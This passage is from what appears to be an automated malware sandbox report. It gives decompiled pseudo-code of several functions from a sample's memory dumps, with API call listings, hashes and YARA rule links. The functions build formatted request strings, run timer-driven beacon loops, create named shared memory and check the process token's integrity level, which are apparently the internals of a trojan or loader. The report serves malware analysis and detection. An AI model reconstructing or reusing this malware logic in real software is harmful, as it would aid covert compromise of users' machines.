				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x1cd02c,  *0x1cd004, _t59);
				_t67 = E001C1C1A();
				_t68 =  *0x1cd27c; // 0x317a7d0
				_t4 = _t68 + 0x1ce673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71; // executed
				_t72 = E001C54BC(_t135); // executed
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x1cd27c; // 0x317a7d0
					_t7 = _t127 + 0x1ce8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x1cd238, 0, _v8);
				}
				_t73 = E001C7649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x1cd27c; // 0x317a7d0
					_t11 = _t122 + 0x1ce8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x1cd238, 0, _v8);
				}
				_t147 =  *0x1cd32c; // 0x33497d8
				_t75 = E001C9395(0x1cd00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x1cd238, _t153, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x1cd238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x1cd238, _t153, _v20);
						goto L26;
					}
					E001C7A80(GetTickCount());
					_t82 =  *0x1cd32c; // 0x33497d8
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x1cd32c; // 0x33497d8
					__imp__(_t86 + 0x40);
					_t88 =  *0x1cd32c; // 0x33497d8
					_t149 = E001C8307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x1cd238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x1cc2ac);
					_push(_t149);
					_t94 = E001C3CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x1cd238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E001C809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E001CA1B0();
						L22:
						HeapFree( *0x1cd238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E001C43DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_t112 = E001C163F(_t158, _a4, _a8, _a12); // executed
						_v12 = _t112;
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E001C9039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E001C85DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E001C9039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}

0x001c8b94
0x001c8b94
0x001c8b94
0x001c8b9f
0x001c8ba6
0x001c8ba8
0x001c8ba8
0x001c8bb5
0x001c8bc0
0x001c8bc3
0x001c8bc8
0x001c8bd1
0x001c8bd4
0x001c8bd9
0x001c8bdc
0x001c8be1
0x001c8be4
0x001c8bf0
0x001c8bfd
0x001c8bff
0x001c8c05
0x001c8c0a
0x001c8c15
0x001c8c17
0x001c8c1a
0x001c8c1c
0x001c8c23
0x001c8c29
0x001c8c2c
0x001c8c2f
0x001c8c34
0x001c8c41
0x001c8c43
0x001c8c49
0x001c8c53
0x001c8c53
0x001c8c55
0x001c8c5c
0x001c8c5f
0x001c8c62
0x001c8c67
0x001c8c74
0x001c8c76
0x001c8c84
0x001c8c84
0x001c8c86
0x001c8c94
0x001c8c99
0x001c8c9d
0x001c8ca0
0x001c8e63
0x001c8e6d
0x001c8e76
0x001c8ca6
0x001c8cb2
0x001c8cba
0x001c8cbd
0x001c8e57
0x001c8e61
0x00000000
0x001c8e61
0x001c8cc9
0x001c8cce
0x001c8cd7
0x001c8ce8
0x001c8cec
0x001c8cf5
0x001c8cfb
0x001c8d0a
0x001c8d11
0x001c8d1a
0x001c8d20
0x001c8e4b
0x001c8e55
0x00000000
0x001c8e55
0x001c8d2c
0x001c8d32
0x001c8d33
0x001c8d3a
0x001c8d3d
0x001c8e41
0x001c8e49
0x00000000
0x001c8e49
0x001c8d46
0x001c8d4d
0x001c8d55
0x001c8d5a
0x001c8d63
0x001c8d69
0x001c8d70
0x001c8d77
0x001c8d7a
0x001c8e79
0x001c8e2d
0x001c8e2d
0x001c8e32
0x001c8e3d
0x001c8e3f
0x00000000
0x001c8e3f
0x001c8d84
0x001c8d8b
0x001c8d8e
0x001c8d93
0x001c8d9e
0x001c8da3
0x001c8da6
0x001c8dac
0x001c8db2
0x001c8db8
0x001c8dbb
0x001c8dc1
0x001c8dc4
0x001c8dc9
0x001c8dcd
0x001c8dcd
0x001c8dd9
0x001c8de5
0x001c8de9
0x001c8deb
0x001c8df0
0x001c8df2
0x001c8df7
0x001c8dfc
0x001c8e09
0x001c8e11
0x001c8e14
0x001c8e14
0x001c8df0
0x00000000
0x001c8ddb
0x001c8ddf
0x001c8e16
0x001c8e19
0x001c8e22
0x00000000
0x00000000
0x00000000
0x00000000
0x001c8e22
0x001c8de1
0x00000000
0x001c8de1
0x001c8dd9

APIs

GetTickCount.KERNEL32(7671BB27,03349B50,766F41C0,03349B50,00000002,001C685F,00000000), ref: 001C8BA8
wsprintfA.USER32 ref: 001C8BF8
wsprintfA.USER32 ref: 001C8C15
wsprintfA.USER32 ref: 001C8C41
HeapFree.KERNEL32(00000000,?), ref: 001C8C53
wsprintfA.USER32 ref: 001C8C74
HeapFree.KERNEL32(00000000,?), ref: 001C8C84
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001C8CB2
GetTickCount.KERNEL32 ref: 001C8CC3
RtlEnterCriticalSection.NTDLL(03349798), ref: 001C8CD7
RtlLeaveCriticalSection.NTDLL(03349798), ref: 001C8CF5

Part of subcall function 001C8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,754294D8,?,?,001CA428,?,033497D8), ref: 001C8332
Part of subcall function 001C8307: lstrlen.KERNEL32(?,?,?,001CA428,?,033497D8), ref: 001C833A
Part of subcall function 001C8307: strcpy.NTDLL ref: 001C8351
Part of subcall function 001C8307: lstrcat.KERNEL32(00000000,?), ref: 001C835C
Part of subcall function 001C8307: StrTrimA.SHLWAPI(00000000,=), ref: 001C8379

StrTrimA.SHLWAPI(00000000,001CC2AC), ref: 001C8D2C

Part of subcall function 001C3CC8: lstrlen.KERNEL32(03349B38,00000000,00000000,754294D8,001CA453,00000000), ref: 001C3CD8
Part of subcall function 001C3CC8: lstrlen.KERNEL32(?), ref: 001C3CE0
Part of subcall function 001C3CC8: lstrcpy.KERNEL32(00000000,03349B38), ref: 001C3CF4
Part of subcall function 001C3CC8: lstrcat.KERNEL32(00000000,?), ref: 001C3CFF

lstrcpy.KERNEL32(00000000,?), ref: 001C8D4D
lstrcpy.KERNEL32(?,?), ref: 001C8D55
lstrcat.KERNEL32(?,?), ref: 001C8D63
lstrcat.KERNEL32(?,00000000), ref: 001C8D69

Part of subcall function 001C809F: lstrlen.KERNEL32(?,00000000,001CD330,00000001,001C2200,001CD00C,001CD00C,00000000,00000005,00000000,00000000,?,?,?,001C96C1,001C23E9), ref: 001C80A8
Part of subcall function 001C809F: mbstowcs.NTDLL ref: 001C80CF
Part of subcall function 001C809F: memset.NTDLL ref: 001C80E1

Part of subcall function 001C43DF: CoCreateInstance.OLE32(0002DF01,00000000,00000004,03348828,00000000), ref: 001C440D

wcstombs.NTDLL ref: 001C8DFC

Part of subcall function 001C163F: SysAllocString.OLEAUT32(?), ref: 001C1680
Part of subcall function 001C163F: ObjectStublessClient9.OLE32(?,?), ref: 001C1721
Part of subcall function 001C163F: StrStrIW.SHLWAPI(?,006E0069), ref: 001C1741

Part of subcall function 001C9039: HeapFree.KERNEL32(00000000,00000000,001C7F18), ref: 001C9045

HeapFree.KERNEL32(00000000,?,?), ref: 001C8E3D
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C8E49
HeapFree.KERNEL32(00000000,?,?), ref: 001C8E55
HeapFree.KERNEL32(00000000,?), ref: 001C8E61
HeapFree.KERNEL32(00000000,?), ref: 001C8E6D

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateClient9CreateEnterInstanceLeaveObjectStringStublessmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3019188316-0
Opcode ID: a5d4655ff6d153d4dda11f91c9e1cd645e9c9fff99432ca6be7686cd02855f92
Instruction ID: c78a0c3befad23e39ad8ca7eaa96bc19534e648a1370743d3c80615db286a41d
Opcode Fuzzy Hash: a5d4655ff6d153d4dda11f91c9e1cd645e9c9fff99432ca6be7686cd02855f92
Instruction Fuzzy Hash: 03912771900108AFCB119FA8EC89EAA7FB9EF58750F154069F408E7661DB31DD91DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001C6786, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E001C6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x1cd240);
					_v20 = 0;
					_v16 = 0;
					L001CB0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x1cd26c; // 0x14c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x1cd24c = 5;
						} else {
							_t68 = E001C73FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x1cd260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E001C8504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E001C3BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x1cd244);
							goto L21;
						} else {
							__eflags =  *0x1cd248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E001CA1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x1cd248);
								L21:
								L001CB0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x1cd238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x001c6786
0x001c6798
0x001c679b
0x001c67a7
0x001c67af
0x001c67b2
0x001c6919
0x001c67b8
0x001c67b8
0x001c67ba
0x001c67bf
0x001c67c0
0x001c67c6
0x001c67c9
0x001c67cc
0x001c67da
0x001c67e5
0x001c67e8
0x001c67ea
0x001c67f7
0x001c6801
0x001c6805
0x001c6808
0x001c680d
0x001c6818
0x001c6818
0x001c680f
0x001c680f
0x001c6816
0x00000000
0x00000000
0x001c6816
0x001c6822
0x00000000
0x001c6825
0x001c6829
0x001c6834
0x001c6834
0x001c683b
0x001c6844
0x001c684b
0x001c6854
0x001c6857
0x001c685a
0x001c6861
0x001c6864
0x00000000
0x00000000
0x001c6866
0x001c6869
0x001c686c
0x001c686f
0x00000000
0x001c6871
0x001c6880
0x001c6880
0x00000000
0x001c68ae
0x001c68ae
0x001c68b3
0x001c68d2
0x001c68d4
0x001c68d9
0x001c68da
0x00000000
0x001c68b5
0x001c68b5
0x001c68bb
0x00000000
0x001c68bd
0x001c68bd
0x001c68c2
0x001c68c4
0x001c68c9
0x001c68ca
0x001c68e0
0x001c68e0
0x001c68e8
0x001c68f3
0x001c68f6
0x001c6901
0x001c6903
0x001c6905
0x001c6908
0x00000000
0x001c690e
0x00000000
0x001c690e
0x001c6908
0x001c68bb
0x00000000
0x001c68b3
0x001c6883
0x001c6885
0x001c6888
0x001c6889
0x001c6889
0x001c688d
0x001c6897
0x001c6897
0x001c689d
0x001c68a0
0x001c68a0
0x001c68a6
0x001c68a6
0x001c6923
0x00000000

APIs

memset.NTDLL ref: 001C679B
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001C67A7
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C67CC
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 001C67E8
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C6801
HeapFree.KERNEL32(00000000,00000000), ref: 001C6897
CloseHandle.KERNEL32(?), ref: 001C68A6
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 001C68E0
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,001C2417,?), ref: 001C68F6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C6901

Part of subcall function 001C73FD: StrToIntExW.SHLWAPI(?,00000000,?), ref: 001C744C
Part of subcall function 001C73FD: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C74E9
Part of subcall function 001C73FD: HeapFree.KERNEL32(00000000,?), ref: 001C74FB

GetLastError.KERNEL32 ref: 001C6913

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: e06dbb7bb93aac84b53926218cb495eb8a605086ce3ffaae4945dfc7d5f85d09
Instruction ID: 469d50d5a0145befce153c7ef40ee0bb2e2160409b92de9c5dd293a250a1233e
Opcode Fuzzy Hash: e06dbb7bb93aac84b53926218cb495eb8a605086ce3ffaae4945dfc7d5f85d09
Instruction Fuzzy Hash: 30513E71801229EADF109FD4DC45EEEBFB8EF69724F204129F514E2190D770DA85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000163F, Relevance: 15.1, APIs: 10, Instructions: 98
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E10001850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E100018F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5);
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E100012DC(E1000135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
				if(E10001538(_t44,  &_a4) != 0) {
					 *0x10004138 = 0;
					goto L11;
				}
				_t43 = _a4;
				_t55 = __imp__GetLongPathNameW;
				_t36 =  *_t55(_t43, 0, 0); // executed
				_t48 = _t36;
				if(_t48 == 0) {
					L9:
					 *0x10004138 = _t43;
					goto L11;
				}
				_t14 = _t48 + 2; // 0x2
				_t38 = E10001DE1(_t48 + _t14);
				 *0x10004138 = _t38;
				if(_t38 == 0) {
					goto L9;
				}
				 *_t55(_t43, _t38, _t48); // executed
				E10001DFC(_t43);
				goto L11;
			}

0x10001646
0x1000164f
0x10001652
0x10001742
0x10001742
0x10001659
0x1000165d
0x10001663
0x10001671
0x10001672
0x10001675
0x10001678
0x10001681
0x10001684
0x1000168a
0x1000168d
0x10001694
0x1000173f
0x00000000
0x1000173f
0x1000169e
0x100016ef
0x100016ef
0x10001705
0x1000170a
0x10001732
0x1000170c
0x1000170f
0x10001717
0x1000171a
0x10001721
0x10001721
0x10001728
0x10001728
0x10001735
0x1000173b
0x1000173d
0x1000173d
0x00000000
0x1000173b
0x100016ab
0x100016e9
0x00000000
0x100016e9
0x100016ad
0x100016b0
0x100016b9
0x100016bb
0x100016bf
0x100016e1
0x100016e1
0x00000000
0x100016e1
0x100016c1
0x100016c6
0x100016cd
0x100016d2
0x00000000
0x00000000
0x100016d7
0x100016da
0x00000000

APIs

Part of subcall function 10001850: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000164B,766F325B), ref: 1000185F
Part of subcall function 10001850: GetVersion.KERNEL32 ref: 1000186E
Part of subcall function 10001850: GetCurrentProcessId.KERNEL32 ref: 10001885
Part of subcall function 10001850: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 1000189E

GetSystemTime.KERNEL32(?,00000000,766F325B), ref: 1000165D
SwitchToThread.KERNEL32 ref: 10001663

Part of subcall function 100018F4: VirtualAlloc.KERNELBASE(00000000,1000167D,00003000,00000004,?,?,1000167D,00000000), ref: 1000194A
Part of subcall function 100018F4: memcpy.NTDLL(?,?,1000167D,?,?,1000167D,00000000), ref: 100019DC
Part of subcall function 100018F4: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,1000167D,00000000), ref: 100019F7

Sleep.KERNEL32(00000000,00000000), ref: 10001684
GetLongPathNameW.KERNELBASE ref: 100016B9
GetLongPathNameW.KERNELBASE ref: 100016D7
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 1000170F
GetExitCodeThread.KERNEL32(00000000,?), ref: 10001721
CloseHandle.KERNEL32(00000000), ref: 10001728
GetLastError.KERNEL32(?,00000000), ref: 10001730
GetLastError.KERNEL32 ref: 1000173D

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 1d94a8f484d99c584117039eeacf9866d0a4ad351db0f72dece7264e9d25b94c
Instruction ID: 51f1b5d7b5d62603e0b6ca74e6a4c687eacd357270907eacbd85172d1a2e8795
Opcode Fuzzy Hash: 1d94a8f484d99c584117039eeacf9866d0a4ad351db0f72dece7264e9d25b94c
Instruction Fuzzy Hash: 2D318F76901225ABE711EBA58C849DF77FDEF843D0B124226F914D3148EB34DB40DB60

Uniqueness

Uniqueness Score: -1.00%

Function 001C1B2F, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E001C1B2F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L001CB0C2();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x1cd27c; // 0x317a7d0
				_t5 = _t13 + 0x1ce862; // 0x3349032
				_t6 = _t13 + 0x1ce59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L001CAD5A();
				_t17 = CreateFileMappingW(0xffffffff, 0x1cd2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x001c1b2f
0x001c1b37
0x001c1b3b
0x001c1b41
0x001c1b46
0x001c1b4b
0x001c1b4e
0x001c1b51
0x001c1b56
0x001c1b57
0x001c1b5a
0x001c1b5f
0x001c1b66
0x001c1b70
0x001c1b72
0x001c1b73
0x001c1b76
0x001c1b92
0x001c1b98
0x001c1b9c
0x001c1bea
0x001c1b9e
0x001c1bab
0x001c1bbb
0x001c1bc3
0x001c1bd5
0x001c1bd9
0x00000000
0x00000000
0x001c1bc5
0x001c1bc8
0x001c1bcd
0x001c1bcf
0x001c1bcf
0x001c1bad
0x001c1baf
0x001c1bdb
0x001c1bdc
0x001c1bdc
0x001c1bab
0x001c1bf1

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,001C22EA,?,?,4D283A53,?,?), ref: 001C1B3B
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001C1B51
_snwprintf.NTDLL ref: 001C1B76
CreateFileMappingW.KERNELBASE(000000FF,001CD2A8,00000004,00000000,00001000,?), ref: 001C1B92
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001C22EA,?,?,4D283A53), ref: 001C1BA4
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 001C1BBB
CloseHandle.KERNEL32(00000000), ref: 001C1BDC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,001C22EA,?,?,4D283A53), ref: 001C1BE4

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: c1013bd80100f123f8a78892546c094f0a66a75221f329740c4955b04583d59c
Instruction ID: 9b7692a667e5343111117dc4ec7a7b4e98815249fc20dce7b9da54a201910502
Opcode Fuzzy Hash: c1013bd80100f123f8a78892546c094f0a66a75221f329740c4955b04583d59c
Instruction Fuzzy Hash: 2021027A640208BBC721ABA4CC05F9A7BB9AF59700F250165F609E7191E770ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001C924F, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001C924F(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x1cd25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E001C2049(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E001C9039(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x001c925c
0x001c9263
0x001c926a
0x001c927e
0x001c9289
0x001c92a1
0x001c92ae
0x001c92b1
0x001c92b6
0x001c92c1
0x001c92c5
0x001c92d4
0x001c92d8
0x001c92f4
0x001c92f4
0x001c92f8
0x001c92f8
0x001c92fd
0x001c9301
0x001c9307
0x001c9308
0x001c930f
0x001c9315

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 001C9281
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 001C92A1
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 001C92B1
CloseHandle.KERNEL32(00000000), ref: 001C9301

Part of subcall function 001C2049: RtlAllocateHeap.NTDLL(00000000,00000000,001C7E50), ref: 001C2055

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 001C92D4
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001C92DC
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001C92EC

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 4b5a5a9440835df6331e0210e4a3f3a4d1edec4b2febc45e4cb9136e8d530456
Instruction ID: 6526fa5c64c0f90e7f507fd110420a2de82d2cf70e130fdbeb491f415f02b925
Opcode Fuzzy Hash: 4b5a5a9440835df6331e0210e4a3f3a4d1edec4b2febc45e4cb9136e8d530456
